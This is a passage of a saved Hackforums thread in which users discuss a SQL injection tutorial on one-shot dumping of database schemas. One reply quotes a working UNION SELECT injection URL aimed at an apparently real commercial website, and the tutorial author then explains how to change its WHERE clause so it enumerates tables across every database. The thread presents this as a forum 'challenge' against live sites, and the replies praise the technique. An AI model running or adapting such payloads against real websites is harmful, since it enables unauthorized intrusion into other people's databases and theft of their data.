1573e49aa19490e486bb804df6cd930a.jpg]" border="0"><br><br>All that with just one command <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/victoire.gif" style="vertical-align: middle;" alt="Victoire" title="Victoire" border="0"><br>Part from picture above with adding mark <span style="color: #32CD32;">*** pass ***</span> at all tables in all databases they have column password is not explained yet. It is used in <a href="http://www.hackforums.net/showthread.php?tid=3562988" target="_blank"><span style="font-size: medium;"><span style="text-decoration: underline;">challenge #50</span></span></a>.<br><br>Thanks for reading <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><br><br>Next part #4 you can find <a href="http://www.hackforums.net/showthread.php?tid=4040708" target="_blank"><span style="text-decoration: underline;">here</span></a>.<br><br><span style="color: #FF0000;"><span style="font-weight: bold;">WARNING</span></span><br>I hope you know about famous HF copy/paste problem with hidden characters. So my advice is: <span style="color: #FFD700;">open
 source of web page (click with right mouse button on page and select 
option View Page Source), locate command there and copy it from there. </span>In source code window those bug characters are visible in red color (see red rectangle on picture bellow).<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/1830dd08be981434974ae6a6ed35e4a4.jpg" alt="[Image: 1830dd08be981434974ae6a6ed35e4a4.jpg]" border="0"><br><span style="color: #32CD32;"><span style="font-weight: bold;">Delete them before running the command.</span></span></div><div class="post_meta" id="post_meta_33441753"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3567217&amp;replyto=33441753" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33445630" id="pid33445630"></a><table class="tborder" style="margin-top: 5px; " id="post_33445630" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">06-21-2013, 02:44 PM <span id="edited_by_33445630"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3567217&amp;pid=33445630#pid33445630">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1722791"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/21058281.jpg" alt="" height="100" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1722791"><span class="group2">bluespider600</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"> <br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 8<br>Posts: 243<br>Joined: Mar 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1722791"><strong class="reputation_positive">10</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33445630">First of all, I really want to thank you for this tutorial, and raise my hat off to you <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><br>Then, about this one:<br><blockquote><cite><span>(06-21-2013 02:00 PM)</span>ajkaro Wrote: <a href="http://www.hackforums.net/showthread.php?pid=33441753#pid33441753" class="quick_jump">►</a></cite><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.comforthomesolution.com/product.php?c=11) and 0 UNION SELECT 1,<br>concat<br>(<br>&nbsp;&nbsp;version(),0x203a3a20616a6b61726f,<br>&nbsp;&nbsp;(select
 (@x) from (select (@x:=0x00),(select (0) from 
(information_schema.tables) where (table_schema=database()) and (0x00) 
in<br>&nbsp;&nbsp;(@x:=concat(@x,0x3c62723e,@tbl:=table_name, 0x202d2d3e207265636f72647320696e207461626c653a20,<br>&nbsp;&nbsp;(select table_rows from information_schema.tables where table_schema=Database() and table_name=@tbl))x)<br>),3,4,5,6,7,8`</code></div></div><br>Bingo. <span style="color: #32CD32;">It works.</span> Challenge #49 solved <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"></blockquote>Check out this pic:<br><div><div class="spoiler_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='(Click to View)';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='(Click to Hide)';}">(Click to View)</a></div><div class="spoiler_body" style="display: none;"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/l3ChYZl.png" alt="[Image: l3ChYZl.png]" border="0"><br></div></div>If we remove the part that says "where table schema=database()", there is no harm done <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/devlish.gif" style="vertical-align: middle;" alt="Devlish" title="Devlish" border="0"> and still, it works and we get the databases, just to make sure, here they are:<br><div><div class="spoiler_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='(Click to View)';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='(Click to Hide)';}">(Click to View)</a></div><div class="spoiler_body" style="display: none;"><span style="font-weight: bold;">Ofc it's ur injection, no credits to me</span>, I just tagged myself in there <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/ninja.gif" style="vertical-align: middle;" alt="Ninja" title="Ninja" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/ninja.gif" style="vertical-align: middle;" alt="Ninja" title="Ninja" border="0"><br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/sEj0yqL.png" alt="[Image: sEj0yqL.png]" border="0"><br></div></div>But ofc we can't remove the word "where" itself, because we need it in the condition of "table_name=xxx".<br><br>So, is that part (table schema=database()) necessary in some other cases? or should I just remove it from my world?<br><br>Great respect for the hard work you've put in those tutorials <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"></div><div class="post_meta" id="post_meta_33445630"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1722791" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3567217&amp;replyto=33445630" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33445862" id="pid33445862"></a><table class="tborder" style="margin-top: 5px; " id="post_33445862" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">06-21-2013, 03:00 PM <span id="edited_by_33445862"><span class="smalltext">(This post was last modified: 06-21-2013 03:02 PM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3567217&amp;pid=33445862#pid33445862">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 130<br>Posts: 2,116<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">192</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33445862"><blockquote><cite><span>(06-21-2013 02:44 PM)</span>bluespider600 Wrote: <a href="http://www.hackforums.net/showthread.php?pid=33445630#pid33445630" class="quick_jump">►</a></cite>...<br>If we remove the part that says "where table schema=database()", there is no harm done <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/devlish.gif" style="vertical-align: middle;" alt="Devlish" title="Devlish" border="0"> and still, it works and we get the databases, just to make sure, here they are:</blockquote><br>Sure
 it works. But challenge #49 demands table from primary database. So you
 should use that part for challenge. That tutorial is explanation how to
 solve challenge #49.<br><br><blockquote><cite><span>(06-21-2013 02:44 PM)</span>bluespider600 Wrote: <a href="http://www.hackforums.net/showthread.php?pid=33445630#pid33445630" class="quick_jump">►</a></cite>So, is that part (table schema=database()) necessary in some other cases? or should I just remove it from my world?<br>...</blockquote><br>Depends what you want:<br><br><span style="color: #32CD32;">#1</span><br>if you want all tables from all databases then you can delete that part.<br><br><span style="color: #32CD32;">#2</span><br>if you want to exclude tables from system information_schema than you will use<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>where table_schema!='information_schema'</code></div></div><br><span style="color: #32CD32;">#3</span><br>if you want tables only from primary database then that part should be there...<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>where table_schema=Database()</code></div></div></div><div class="post_meta" id="post_meta_33445862"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3567217&amp;replyto=33445862" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33445920" id="pid33445920"></a><table class="tborder" style="margin-top: 5px; " id="post_33445920" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">06-21-2013, 03:04 PM <span id="edited_by_33445920"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3567217&amp;pid=33445920#pid33445920">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1722791"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/21058281.jpg" alt="" height="100" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1722791"><span class="group2">bluespider600</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 8<br>Posts: 243<br>Joined: Mar 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1722791"><strong class="reputation_positive">10</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33445920"><blockquote><cite><span>(06-21-2013 03:00 PM)</span>ajkaro Wrote: <a href="http://www.hackforums.net/showthread.php?pid=33445862#pid33445862" class="quick_jump">►</a></cite><span style="color: #32CD32;">#3</span><br>if you want tables only from primary database then that part should be there...<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>where table_schema=Database()</code></div></div></blockquote>Wonderful.. so that's why it's there <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/victoire.gif" style="vertical-align: middle;" alt="Victoire" title="Victoire" border="0"></div><div class="post_meta" id="post_meta_33445920"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1722791" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3567217&amp;replyto=33445920" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33456707" id="pid33456707"></a><table class="tborder" style="margin-top: 5px; " id="post_33456707" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">06-22-2013, 06:03 AM <span id="edited_by_33456707"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3567217&amp;pid=33456707#pid33456707">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=937949"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/avatar_4686.gif" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=937949"><span class="group2">deejay.dude</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 14<br>Posts: 300<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=937949"><strong class="reputation_positive">1</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33456707">I
 take a bow ajkaro. This is series of yours should be obligatory reading
 for newbies. Really that effort you've put into this is amazing. well 
done.</div><div class="post_meta" id="post_meta_33456707"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=937949" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3567217&amp;replyto=33456707" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33479486" id="pid33479486"></a><table class="tborder" style="margin-top: 5px; " id="post_33479486" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">06-23-2013, 07:56 AM <span id="edited_by_33479486"><span class="smalltext">(This post was last modified: 06-23-2013 07:57 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1845525">ssomeone35</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3567217&amp;pid=33479486#pid33479486">#6</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1845525"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/Cyan.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1845525"><span class="group2">ssomeone35</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Powindah<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 1<br>Posts: 15<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1845525"><strong class="reputation_positive">1</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33479486">nice tutorial :) i really liked the move when set a variable <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"></div><div class="post_meta" id="post_meta_33479486"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1845525" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3567217&amp;replyto=33479486" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33548134" id="pid33548134"></a><table class="tborder" style="margin-top: 5px; " id="post_33548134" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">06-26-2013, 07:53 AM <span id="edited_by_33548134"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3567217&amp;pid=33548134#pid33548134">#7</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 130<br>Posts: 2,116<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">192</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33548134"><blockquote><cite><span>(06-21-2013 03:04 PM)</span>bluespider600 Wrote: <a href="http://www.hackforums.net/showthread.php?pid=33445920#pid33445920" class="quick_jump">►</a></cite>Wonderful.. so that's why it's there <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/victoire.gif" style="vertical-align: middle;" alt="Victoire" title="Victoire" border="0"></blockquote><br><blockquote><cite><span>(06-22-2013 06:03 AM)</span>deejay.dude Wrote: <a href="http://www.hackforums.net/showthread.php?pid=33456707#pid33456707" class="quick_jump">►</a></cite>I
 take a bow ajkaro. This is series of yours should be obligatory reading
 for newbies. Really that effort you've put into this is amazing. well 
done.</blockquote><br><blockquote><cite><span>(06-23-2013 07:56 AM)</span>ssomeone35 Wrote: <a href="http://www.hackforums.net/showthread.php?pid=33479486#pid33479486" class="quick_jump">►</a></cite>nice tutorial :) i really liked the move when set a variable <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"></blockquote><br>Thanks
 guys for your feed back. I am using that syntax all the time because 
that way I get much more data with much less commands. <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"></div><div class="post_meta" id="post_meta_33548134"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3567217&amp;replyto=33548134" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33548597" id="pid33548597"></a><table class="tborder" style="margin-top: 5px; " id="post_33548597" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">06-26-2013, 08:23 AM <span id="edited_by_33548597"><span class="smalltext">(This post was last modified: 06-26-2013 08:24 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1750576">OxAlien</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3567217&amp;pid=33548597#pid33548597">#8</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1750576"><span class="group2">OxAlien</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%233%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 7<br>Posts: 101<br>Joined: Apr 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1750576"><strong class="reputation_positive">1</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33548597"><span style="color: white;">Nice HQ tutorial like always :)<br>thanks ajkaro</span></div><div class="post_meta" id="post_meta_33548597"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1750576" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3567217&amp;replyto=33548597" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33577312" id="pid33577312"></a><table class="tborder" style="margin-top: 5px; " id="post_33577312" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">06-27-2013, 02:29 PM <span id="edited_by_33577312"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a 